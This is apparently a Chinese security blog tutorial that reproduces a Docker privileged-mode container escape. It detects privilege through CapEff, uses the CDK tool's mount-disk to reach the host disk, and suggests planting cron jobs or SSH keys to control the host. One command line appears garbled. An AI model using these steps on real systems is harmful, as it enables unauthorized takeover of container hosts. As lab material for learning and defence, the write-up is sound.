docker逃逸漏洞复现(docker tz)

文章前言

在Docker中Privileged是一种特殊的权限模式,它允许Docker容器在启动时获取到与宿主机相同的权限级别。具体来说,Privileged权限可以让容器拥有以下能力:

1、访问宿主机的所有设备文件
2、在容器内部运行与宿主机上相同的内核模块
3、能够修改容器内部的网络配置
4、可以使用mount命令挂载宿主机上任意文件系统

需要注意的是使用Privileged权限可以给容器带来更高的权限,但同时也会带来安全风险。因此,在使用Privileged权限时应该非常谨慎,并且只应该在特定场景下使用,例如需要进行底层系统调试或者测试等需要访问宿主机资源的场景。

漏洞概述

操作者使用特权模式启动的容器时,Docker管理员可以通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令

环境搭建

docker run -v /home/ubuntu/cdk:/cdk --rm -it --privileged ubuntu bash

特权检测

在容器中时可以通过如下参数检测当前容器是否是以特权模式启动:

cat /proc/self/status | grep CapEff

如果是以特权模式启动的话,CapEff对应的掩码值为0000003fffffffff

docker逃逸漏洞复现(docker tz)

通过capsh命令可以解码出具体的Capabilitie

docker逃逸漏洞复现(docker tz)

漏洞利用

Step 1:容器内部执行以下命令

./cdk run mount-disk

Step 2:在容器内部进入挂载目录,直接管理宿主机磁盘文件

cd /tmp/cdk_dyyopls -al

Step  3:之后写入计划任务或者通过写入SSH公钥并进行远程连接获取主机权限即可(ubuntu中计划任务总是有问题很迷)

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34221.html

(0)
七芒星实验室的头像七芒星实验室
上一篇 2024年4月8日
下一篇 2024年4月8日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注